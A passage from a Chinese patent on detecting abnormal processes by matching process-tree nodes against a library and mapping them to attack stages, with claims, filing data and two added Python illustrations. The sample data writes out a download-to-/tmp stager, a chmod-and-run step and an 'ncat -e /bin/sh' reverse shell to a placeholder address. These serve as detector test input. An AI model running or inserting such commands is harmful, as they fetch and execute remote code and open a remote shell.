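ALIASES = {"python3": "python", "python2": "python", "sh": "bash", "/bin/bash": "bash"}
# Changeable parameter values: URLs, IPv4 addresses with optional port, paths, numbers.
_VARIABLE = re.compile(r"^(?:https?://\S+|\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?|/\S+|\d+)$")
# Step 1022 (assumed table): behaviour feature -> (attack stage, stage type).
STAGE_MAP = {
    "curl PARAM": ("download", "delivery"),
    "chmod +x PARAM": ("prepare-payload", "delivery"),
    "bash -c PARAM": ("run-script", "execution"),
}

@dataclass
class ProcNode:
    pid: int
    parent: int | None
    cmd: str
    params: str
    feature: str

def homogenize(cmd: str) -> str:
    """Step 1004: map every form of a command to one canonical form."""
    return ALIASES.get(cmd, cmd)

def param_feature(params: str) -> str:
    """Step 1006 (third level of fig. 8): changeable values become PARAM, flags are kept."""
    return " ".join("PARAM" if _VARIABLE.match(t) else t for t in params.split())

def build_target_tree(records) -> dict[int, ProcNode]:
    """Steps 1002-1010; records are (pid, parent pid, command, parameters)."""
    tree = {}
    for pid, ppid, cmd, params in records:
        cmd = homogenize(cmd)
        feature = f"{cmd} {param_feature(params)}".strip()  # step 1008
        tree[pid] = ProcNode(pid, ppid, cmd, params, feature)
    return tree

def match_abnormal(tree, library_features: set[str]) -> set[int]:
    """Step 1012: a node whose feature equals a library node's feature is abnormal."""
    return {pid for pid, n in tree.items() if n.feature in library_features}

def preliminary_detect(tree, abnormal: set[int], threshold: int):
    """Steps 1014-1020. Assumed reading of 'connected': an abnormal node whose parent
    or a child is also abnormal; candidates are de-duplicated by feature."""
    connected = {pid for pid in abnormal
                 if tree[pid].parent in abnormal or any(tree[c].parent == pid for c in abnormal)}
    distinct = {tree[pid].feature for pid in connected}
    return len(distinct) > threshold, connected

def advanced_detect(tree, abnormal: set[int]):
    """Steps 1022-1026: abnormal if any mapped attack stage is of the execution type."""
    stages = {pid: STAGE_MAP.get(tree[pid].feature, ("unknown", "unknown")) for pid in abnormal}
    return any(kind == "execution" for _, kind in stages.values()), stages

def process_chains(tree) -> list[list[int]]:
    """Root-to-leaf paths of the tree, i.e. its process chains (step 1010)."""
    children = {pid: [c.pid for c in tree.values() if c.parent == pid] for pid in tree}
    chains: list[list[int]] = []

    def walk(pid, path):
        path = path + [pid]
        if not children[pid]:
            chains.append(path)
        for c in children[pid]:
            walk(c, path)

    for pid, n in tree.items():
        if n.parent not in tree:
            walk(pid, [])
    return chains

def target_alarm(tree, abnormal, stages) -> list[str]:
    """Steps 1028-1032: single-point alarms joined in series per chain, then merged."""
    report = []
    for chain in process_chains(tree):
        points = [f"pid {p}:{tree[p].feature}@{stages[p][0]}" for p in chain if p in abnormal]
        if points:
            report.append(" -> ".join(points))
    return report

def detect(records, library_features, threshold=2):
    """Full pipeline: ('normal' | 'abnormal', target alarm information)."""
    tree = build_target_tree(records)
    abnormal = match_abnormal(tree, library_features)
    if not preliminary_detect(tree, abnormal, threshold)[0]:
        return "normal", []
    advanced, stages = advanced_detect(tree, abnormal)
    return ("abnormal", target_alarm(tree, abnormal, stages)) if advanced else ("normal", [])

# Constructed sample: a shell spawns a script runner that downloads a file and marks
# it executable, plus a benign sibling process. The library features are assumed.
SAMPLE = [(1, None, "/bin/bash", ""), (2, 1, "sh", "-c /tmp/drop.sh"),
          (3, 2, "curl", "http://10.0.0.5/x"), (4, 2, "chmod", "+x /tmp/x"),
          (5, 1, "python3", "app.py")]
LIBRARY = {"curl PARAM", "chmod +x PARAM", "bash -c PARAM"}
```

A lone library match under a benign parent never reaches the threshold, so the preliminary stage alone already suppresses isolated hits; only a connected group with an execution-type stage produces target alarm information.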
The application further provides an application scenario: the abnormal process detection method of the application can be applied to an attack detection scenario for computer equipment deployed in a non-cloud environment. It can be understood that a great deal of important data is stored on such computer equipment, and it is necessary to perform anomaly detection on the processes received by the computer equipment and to intervene on processes detected as abnormal, so as to prevent security risk events such as virus propagation, vulnerability exploitation and data leakage, and thus ensure the security of the data on the computer equipment. By the abnormal process detection method, the abnormal process detection accuracy for computer equipment deployed in a non-cloud environment can be improved.
It should be understood that, although the steps in the flowcharts of the above embodiments are shown in sequence, the steps are not necessarily executed in that sequence. Unless explicitly stated otherwise, the steps are not bound to the exact order shown and described and may be performed in other orders. Moreover, at least a part of the steps in the above embodiments may include multiple sub-steps or multiple stages, which are not necessarily performed at the same time but may be performed at different times, and the order of performing the sub-steps or stages is not necessarily sequential; they may be performed alternately with other steps or with at least a part of the sub-steps or stages of other steps.
In one embodiment, as shown in fig. 11, an abnormal process detection apparatus 1100 is provided, which may be a part of a computer device using a software module or a hardware module, or a combination of the two, and specifically includes:
an obtaining module 1102, configured to obtain a target process tree constructed based on a generating relationship among multiple processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
a matching module 1104, configured to match each process node in the target process tree with a process node in a pre-constructed abnormal process tree library, respectively, to obtain a matched abnormal process node;
a detection module 1106, configured to perform preliminary anomaly detection on the target process tree based on a communication condition between the abnormal process nodes;
the mapping module 1108 is configured to map, under the condition that the target process tree is detected to be abnormal preliminarily, process behavior characteristics corresponding to an abnormal process node to obtain an attack stage corresponding to the abnormal process node;
the detecting module 1106 is further configured to perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each anomalous process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
In one embodiment, the mapping module 1108 is further configured to determine a mapping relationship between preset process behavior characteristics and an attack phase; and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node.
In an embodiment, the detecting module 1106 is further configured to determine that the target process tree is abnormal if at least one of the attack phases respectively corresponding to each abnormal process node in the target process tree belongs to the execution type.
In one embodiment, the target process tree includes at least one process chain; each process chain comprises at least one process node; the apparatus further comprises:
the merging module is used for generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree; after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain; and merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information.
In one embodiment, the apparatus further comprises:
the first construction module is used for acquiring at least one piece of historical alarm information; the historical alarm information is obtained by respectively carrying out abnormality detection on each process node in at least one historical process tree; aiming at each piece of historical alarm information, determining a process node aimed at by the historical alarm information to obtain an alarm process node corresponding to the historical alarm information, and extracting a process subtree taking the alarm process node as a new root node from a process tree in which the alarm process node is positioned to obtain a process subtree corresponding to the historical alarm information; and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
In one embodiment, the detecting module 1106 is further configured to determine connected abnormal process nodes from the matched abnormal process nodes to obtain a target abnormal process node; and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
In one embodiment, the detecting module 1106 is further configured to determine connected abnormal process nodes from the matched abnormal process nodes, to obtain a plurality of candidate abnormal process nodes; determining abnormal process nodes with the same process behavior characteristics from a plurality of candidate abnormal process nodes; and carrying out duplicate removal on the abnormal process nodes with the same process behavior characteristics to obtain target abnormal process nodes.
In an embodiment, the matching module 1104 is further configured to compare, for each process node in the target process tree, the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library, respectively, and to take the process node in the target process tree whose characteristics match as the abnormal process node.
In one embodiment, process behavior characteristics are stored in the process nodes of the target process tree; the stored process behavior characteristics are obtained by extracting the process commands corresponding to the process nodes; the apparatus further comprises:
the second construction module, used for acquiring an initial process tree constructed based on the generation relation among the processes; the initial process tree comprises at least one process node storing a process command; a generating relation exists between two process nodes on a common edge in the initial process tree; performing homogenization conversion on all process commands stored in the process nodes of the initial process tree that have different forms but the same function, so that all process commands with the same function have the same form, to obtain a homogenized process tree; and performing feature extraction on the process commands in the process nodes of the homogenized process tree to obtain process behavior characteristics, and constructing the target process tree based on the process behavior characteristics.
In one embodiment, the process node of the target process tree further stores a command parameter corresponding to the process command; the stored process behavior characteristics are extracted based on the process command corresponding to the process node and the command parameters corresponding to the process command; the second building module is also used for carrying out feature extraction on the command parameters of the process nodes in the process tree after homogenization to obtain command parameter features; and performing feature extraction on the process command and the command parameter features in the process node to obtain process behavior features, and constructing a target process tree based on the process behavior features.
In one embodiment, the apparatus further comprises:
the updating module, used for, in the case that the anomaly detection result indicates that the target process tree is abnormal but the target process tree is not truly abnormal, determining the process node in the abnormal process tree library that caused the false alarm of the target process tree anomaly and deleting the process node that caused the false alarm, so as to update the abnormal process tree library.
In one embodiment, the obtaining module 1102 is further configured to obtain a target process tree of the host; the target process tree is constructed according to the generation relation among a plurality of processes running on the host; the detecting module 1106 is further configured to determine that a process attacking the host exists in the plurality of processes if the anomaly detection result for the target process tree indicates that the target process tree is abnormal.
The abnormal process detection apparatus acquires a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises at least one process node. Each process node in the target process tree is matched with the process nodes in the pre-constructed abnormal process tree library, and because each process node in the abnormal process tree library is abnormal, the abnormal process nodes in the target process tree can be determined more accurately. Preliminary anomaly detection of the target process tree is then performed based on the connectivity between the abnormal process nodes, so that whether the target process tree is abnormal can be accurately detected in a preliminary way. In the case that the target process tree is preliminarily detected as abnormal, the process behavior characteristics corresponding to each abnormal process node are mapped to obtain the attack stage corresponding to that abnormal process node. Because a generation relation exists between two process nodes on a common edge in the target process tree, performing advanced anomaly detection on the target process tree through the attack stages corresponding to the abnormal process nodes takes the information of the whole attack process corresponding to those nodes into account, so that the anomaly detection result for the target process tree can be obtained accurately, and the detection accuracy for abnormal processes is improved.
The modules in the abnormal process detection device can be wholly or partially realized by software, hardware and a combination thereof. The modules can be embedded in a hardware form or independent from a processor in the computer device, and can also be stored in a memory in the computer device in a software form, so that the processor can call and execute operations corresponding to the modules.
In one embodiment, a computer device is provided, which may be a server, and its internal structure diagram may be as shown in fig. 12. The computer device includes a processor, a memory, an Input/Output interface (I/O for short), and a communication interface. The processor, the memory and the input/output interface are connected through a system bus, and the communication interface is connected to the system bus through the input/output interface. Wherein the processor of the computer device is configured to provide computing and control capabilities. The memory of the computer device includes a non-volatile storage medium and an internal memory. The non-volatile storage medium stores an operating system, a computer program, and a database. The internal memory provides an environment for the operation of an operating system and computer programs in the non-volatile storage medium. The input/output interface of the computer device is used for exchanging information between the processor and an external device. The communication interface of the computer device is used for connecting and communicating with an external terminal through a network. The computer program is executed by a processor to implement an abnormal process detection method.
In one embodiment, a computer device is provided, which may be a terminal, and its internal structure diagram may be as shown in fig. 13. The computer apparatus includes a processor, a memory, an input/output interface, a communication interface, a display unit, and an input device. The processor, the memory and the input/output interface are connected through a system bus, and the communication interface, the display unit and the input device are connected to the system bus through the input/output interface. Wherein the processor of the computer device is configured to provide computing and control capabilities. The memory of the computer device comprises a nonvolatile storage medium and an internal memory. The non-volatile storage medium stores an operating system and a computer program. The internal memory provides an environment for the operation of an operating system and computer programs in the non-volatile storage medium. The input/output interface of the computer device is used for exchanging information between the processor and an external device. The communication interface of the computer device is used for carrying out wired or wireless communication with an external terminal, and the wireless communication can be realized through WIFI, a mobile cellular network, NFC (near field communication) or other technologies. The computer program is executed by a processor to implement an abnormal process detection method. The display unit of the computer equipment is used for forming a visual and visible picture, and can be a display screen, a projection device or a virtual reality imaging device, the display screen can be a liquid crystal display screen or an electronic ink display screen, the input device of the computer equipment can be a touch layer covered on the display screen, a key, a track ball or a touch pad arranged on the shell of the computer equipment, and can also be an external keyboard, a touch pad or a mouse and the like.
It will be appreciated by those skilled in the art that the configurations shown in fig. 12 and 13 are only block diagrams of some configurations relevant to the present disclosure, and do not constitute a limitation on the computer device to which the present disclosure may be applied, and a particular computer device may include more or less components than those shown in the figures, or may combine certain components, or have a different arrangement of components.
In one embodiment, a computer device is further provided, which includes a memory and a processor, the memory stores a computer program, and the processor implements the steps of the above method embodiments when executing the computer program.
In an embodiment, a computer-readable storage medium is provided, in which a computer program is stored which, when being executed by a processor, carries out the steps of the above-mentioned method embodiments.
In an embodiment, a computer program product is provided, comprising a computer program which, when executed by a processor, carries out the steps in the above-described method embodiments.
It should be noted that, the user information (including but not limited to user equipment information, user personal information, etc.) and data (including but not limited to data for analysis, stored data, displayed data, etc.) referred to in the present application are information and data authorized by the user or sufficiently authorized by each party, and the collection, use and processing of the related data need to comply with the relevant laws and regulations and standards of the relevant country and region.
It will be understood by those skilled in the art that all or part of the processes of the methods of the embodiments described above can be implemented by a computer program instructing the relevant hardware; the computer program can be stored in a non-volatile computer-readable storage medium and, when executed, can include the processes of the embodiments of the methods described above. Any reference to memory, storage, a database or other medium used in the embodiments provided herein can include at least one of non-volatile and volatile memory. Non-volatile memory may include Read-Only Memory (ROM), magnetic tape, floppy disk, flash memory, optical storage, or the like. Volatile memory can include Random Access Memory (RAM) or external cache memory. By way of illustration and not limitation, RAM can take many forms, such as Static Random Access Memory (SRAM) or Dynamic Random Access Memory (DRAM), among others.
The technical features of the above embodiments can be arbitrarily combined, and for the sake of brevity, all possible combinations of the technical features in the above embodiments are not described, but should be considered as the scope of the present specification as long as there is no contradiction between the combinations of the technical features.
The above-mentioned embodiments only express several embodiments of the present application, and the description thereof is more specific and detailed, but not construed as limiting the scope of the invention. It should be noted that, for a person skilled in the art, several variations and modifications can be made without departing from the concept of the present application, which falls within the scope of protection of the present application. Therefore, the protection scope of the present patent shall be subject to the appended claims.

Claims (16)

1. An abnormal process detection method, characterized in that the method comprises:
acquiring a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing an edge in the target process tree;
matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
performing preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes;
under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node;
and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree.
2. The method according to claim 1, wherein the mapping the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node comprises:
determining a mapping relation between preset process behavior characteristics and an attack stage;
and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node.
3. The method of claim 1, wherein the target process tree comprises at least one process chain; each process chain comprises at least one process node; the method further comprises the following steps:
generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree;
after the advanced anomaly detection determines that the target process tree is abnormal, for each process chain in the target process tree, connecting the single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain;
and merging the alarm information corresponding to each process chain in the target process tree to obtain target alarm information and outputting the target alarm information.
4. The method of claim 1, further comprising the step of constructing an abnormal process tree library; the construction step of the abnormal process tree library comprises the following steps:
acquiring at least one piece of historical alarm information; the historical alarm information is obtained by respectively carrying out abnormality detection on each process node in at least one historical process tree;
aiming at each piece of historical alarm information, determining a process node aimed at by the historical alarm information to obtain an alarm process node corresponding to the historical alarm information, and extracting a process subtree taking the alarm process node as a new root node from a process tree in which the alarm process node is located to obtain a process subtree corresponding to the historical alarm information;
and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
5. The method as claimed in claim 1, wherein the preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes comprises:
determining connected abnormal process nodes from the matched abnormal process nodes to obtain target abnormal process nodes;
and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
6. The method of claim 5, wherein determining the connected abnormal process nodes from the matched abnormal process nodes to obtain the target abnormal process nodes comprises:
determining connected abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes;
determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes;
and de-duplicating the abnormal process nodes with the same process behavior characteristics to obtain the target abnormal process nodes.
7. The method of claim 1, wherein process behavior characteristics are stored in process nodes of the target process tree; the stored process behavior characteristics are extracted based on the process command corresponding to the process node; the method further comprises a step of constructing a target process tree, wherein the step of constructing the target process tree comprises the following steps:
acquiring an initial process tree constructed based on a generation relation among a plurality of processes; the initial process tree comprises at least one process node storing a process command; a generation relation exists between two process nodes sharing an edge in the initial process tree;
normalizing the process commands stored in the process nodes of the initial process tree, so that process commands which have different forms but the same function are converted into the same form, to obtain a normalized process tree;
and performing feature extraction on the process commands in the process nodes of the normalized process tree to obtain process behavior characteristics, and constructing the target process tree based on the process behavior characteristics.
8. The method of claim 7, wherein the process nodes of the target process tree further store command parameters corresponding to the process commands; the stored process behavior characteristics are extracted based on the process command corresponding to the process node and the command parameters corresponding to the process command; and the step of performing feature extraction on the process commands in the process nodes of the normalized process tree to obtain process behavior characteristics, and constructing the target process tree based on the process behavior characteristics, comprises:
performing feature extraction on the command parameters of the process nodes in the normalized process tree to obtain command parameter features;
and performing feature extraction on the process command and the command parameter features in each process node to obtain the process behavior characteristics, and constructing the target process tree based on the process behavior characteristics.
9. The method according to claim 1, wherein the matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node comprises:
and aiming at each process node in the target process tree, respectively comparing the process behavior characteristics corresponding to the process nodes with the process behavior characteristics corresponding to the process nodes in the abnormal process tree library, and taking the process nodes with the consistent characteristics in the target process tree as abnormal process nodes.
10. The method according to claim 1, wherein the performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result for the target process tree comprises:
and if, among the attack stages respectively corresponding to the abnormal process nodes in the target process tree, at least one stage belongs to the execution type, judging that the target process tree is abnormal.
11. The method of claim 10, further comprising:
and in the case that the anomaly detection result indicates that the target process tree is abnormal but the target process tree is in fact not abnormal (a false alarm), determining, in the abnormal process tree library, the process node that caused the target process tree to be wrongly judged abnormal, and deleting that process node so as to update the abnormal process tree library.
12. The method according to any one of claims 1 to 11, wherein the obtaining a target process tree constructed based on generative relationships among a plurality of processes comprises:
acquiring a target process tree of a host; the target process tree is constructed according to the generation relationship among a plurality of processes running on the host;
the method further comprises the following steps:
and if the abnormality detection result aiming at the target process tree indicates that the target process tree is abnormal, judging that a process attacking the host exists in the processes.
13. An abnormal process detection apparatus, the apparatus comprising:
the acquisition module is used for acquiring a target process tree constructed based on the generation relationship among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
the matching module is used for respectively matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
the detection module is used for performing preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes;
the mapping module is used for mapping the process behavior characteristics corresponding to the abnormal process node under the condition of preliminarily detecting the abnormality of the target process tree to obtain an attack stage corresponding to the abnormal process node;
the detection module is further configured to perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
14. A computer device comprising a memory and a processor, the memory storing a computer program, characterized in that the processor, when executing the computer program, implements the steps of the method of any of claims 1 to 12.
15. A computer-readable storage medium, in which a computer program is stored which, when being executed by a processor, carries out the steps of the method according to any one of claims 1 to 12.
16. A computer program product comprising a computer program, characterized in that the computer program realizes the steps of the method of any one of claims 1 to 12 when executed by a processor.
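The detection pipeline of claims 1 to 10, written out as an added Python illustration; this is not the patent's or the applicant's code. The command normalisation table (claim 7), the coarse parameter labels (claim 8), the abnormal-process library (which claim 4 would derive from the subtrees under historical alerts), the feature-to-stage mapping (claim 2), the grouping of stages into an "execution type" (claim 10), the count threshold (claim 5) and the sample process list are all constructed assumptions, and "connected" (claims 5 and 6) is read as adjacency through tree edges whose both endpoints are matched abnormal nodes, so a lone library hit never counts toward the preliminary verdict.

```python
"""Process-tree anomaly detection in the shape of claims 1-10 of CN115827379A.
Added illustration, not the patent's code: normalisation table, feature labels,
library, stage mapping, execution-type grouping and threshold are all constructed."""
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 marks a root whose parent is outside the tree
    cmdline: str


# Claim 7: different forms of the same command collapse to one form (constructed table).
CANONICAL = {"/bin/bash": "bash", "/bin/sh": "sh", "dash": "sh", "/usr/bin/curl": "curl",
             "/usr/bin/wget": "wget", "ncat": "nc", "netcat": "nc", "python3": "python"}


def behaviour_feature(cmdline: str) -> str:
    """Claim 8: feature = normalised command plus coarse parameter labels, so two
    downloads to different URLs, or two droppers in different /tmp paths, match."""
    parts = cmdline.split()
    cmd = CANONICAL.get(parts[0], parts[0])
    if cmd.startswith(("/tmp/", "/dev/shm/")):
        cmd = "tmp_exec"                      # binary run out of a world-writable dir
    labels = set()
    for arg in parts[1:]:
        if "http://" in arg or "https://" in arg:
            labels.add("url")
        if "/tmp/" in arg or "/dev/shm/" in arg:
            labels.add("tmp_path")
        if arg in ("-c", "-e"):
            labels.add("flag" + arg)
        if arg.startswith("+x"):
            labels.add("exec_bit")
    return f"{cmd}[{','.join(sorted(labels))}]"


# Constructed library (claim 4 would build it from historical alert subtrees) and the
# feature -> attack-stage mapping of claim 2.
STAGE_OF = {"python[flag-c,tmp_path,url]": "delivery", "curl[tmp_path,url]": "delivery",
            "sh[exec_bit,flag-c,tmp_path]": "preparation", "chmod[exec_bit,tmp_path]": "preparation",
            "tmp_exec[]": "execution", "nc[flag-e]": "command_and_control"}
ABNORMAL_LIBRARY = set(STAGE_OF)
EXECUTION_TYPE = {"execution", "command_and_control"}   # claim 10's "execution type" stages
THRESHOLD = 2   # claim 5: more than this many distinct, connected abnormal features


def analyse(procs: list, threshold: int = THRESHOLD) -> dict:
    by_pid = {p.pid: p for p in procs}
    children = {p.pid: [] for p in procs}
    for p in procs:
        if p.ppid in children:
            children[p.ppid].append(p.pid)
    feat = {p.pid: behaviour_feature(p.cmdline) for p in procs}
    abnormal = {pid for pid, f in feat.items() if f in ABNORMAL_LIBRARY}   # claim 9
    # Claims 5-6: components over tree edges whose both ends are abnormal (assumption);
    # components of one node are dropped, and duplicate features count once.
    seen, connected = set(), set()
    for start in abnormal:
        if start in seen:
            continue
        comp, queue = set(), deque([start])
        while queue:
            pid = queue.popleft()
            if pid in comp:
                continue
            comp.add(pid)
            queue.extend(n for n in children[pid] + [by_pid[pid].ppid] if n in abnormal)
        seen |= comp
        if len(comp) >= 2:
            connected |= comp
    distinct = {feat[pid] for pid in connected}
    result = {"abnormal_nodes": sorted(abnormal), "connected": sorted(connected),
              "preliminary": len(distinct) > threshold, "stages": {}, "abnormal": False, "alert": ""}
    if not result["preliminary"]:
        return result
    stages = {pid: STAGE_OF[feat[pid]] for pid in abnormal}            # claim 2
    result["stages"] = stages
    result["abnormal"] = any(s in EXECUTION_TYPE for s in stages.values())   # claim 10
    if not result["abnormal"]:
        return result
    # Claim 3: per root-to-leaf chain, string the single-point alerts together, then merge.
    chains = []

    def walk(pid, path):
        path = path + [pid]
        if not children[pid]:
            chains.append(path)
        for child in children[pid]:
            walk(child, path)

    for root in (p.pid for p in procs if p.ppid not in by_pid):
        walk(root, [])
    chain_alerts = [" -> ".join(f"{pid}:{feat[pid]}@{stages[pid]}" for pid in path if pid in abnormal)
                    for path in chains]
    result["alert"] = " | ".join(dict.fromkeys(a for a in chain_alerts if a))
    return result


# Constructed sample: an SSH session pulls a stager with python, drops /tmp/.x, marks it
# executable, runs it and it calls back with nc; a second session makes a benign download
# whose feature happens to be in the library (a single-point hit that stays isolated).
SAMPLE = [
    Proc(1, 0, "/usr/sbin/sshd -D"),
    Proc(10, 1, "/bin/bash"),
    Proc(11, 10, "python3 -c import urllib.request as u;open('/tmp/.x','wb').write(u.urlopen('http://203.0.113.5/x').read())"),
    Proc(12, 11, "/bin/sh -c chmod +x /tmp/.x && /tmp/.x"),
    Proc(13, 12, "chmod +x /tmp/.x"),
    Proc(14, 12, "/tmp/.x"),
    Proc(15, 14, "ncat -e /bin/sh 203.0.113.5 4444"),
    Proc(20, 1, "/bin/bash"),
    Proc(21, 20, "/usr/bin/curl -s https://example.com/ -o /tmp/page.html"),
]

if __name__ == "__main__":
    verdict = analyse(SAMPLE)
    print("preliminary:", verdict["preliminary"], "abnormal:", verdict["abnormal"])
    print(verdict["alert"])
```

On the sample, the benign curl in the second session matches the library on its own but has no abnormal neighbour, so it yields only a single-point alert and does not count toward the threshold; the five-node chain under the first bash is connected, exceeds the threshold, and contains execution-type stages, so the tree is judged abnormal and the per-chain alerts are merged into one. A tree whose connected abnormal nodes are all delivery or preparation stages passes the preliminary check but fails the advanced one, which is the false-positive case the two-stage design is meant to suppress.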
CN202211476713.6A 2022-11-23 2022-11-23 Abnormal process detection method, device, equipment and medium Pending CN115827379A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202211476713.6A CN115827379A (en) 2022-11-23 2022-11-23 Abnormal process detection method, device, equipment and medium

Publications (1)

Publication Number Publication Date
CN115827379A true CN115827379A (en) 2023-03-21

Family

ID=85530750

Country Status (1)

Country Link
CN (1) CN115827379A (en)

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN112114995A (en) * 2020-09-29 2020-12-22 平安普惠企业管理有限公司 Process-based terminal anomaly analysis method, device, equipment and storage medium
US20220053335A1 (en) * 2021-01-29 2022-02-17 Beijing Baidu Netcom Science Technology Co., Ltd. Method for detecting an abnormal device, device and storage medium
CN114679315A (en) * 2022-03-25 2022-06-28 中国工商银行股份有限公司 Attack detection method, apparatus, computer device, storage medium, and program product
CN114925366A (en) * 2022-05-31 2022-08-19 苏州浪潮智能科技有限公司 Method, system, terminal and storage medium for virus detection and blocking

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116938605A (en) * 2023-09-18 2023-10-24 腾讯科技(深圳)有限公司 Network attack protection method and device, electronic equipment and readable storage medium
CN116938605B (en) * 2023-09-18 2024-01-05 腾讯科技(深圳)有限公司 Network attack protection method and device, electronic equipment and readable storage medium

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination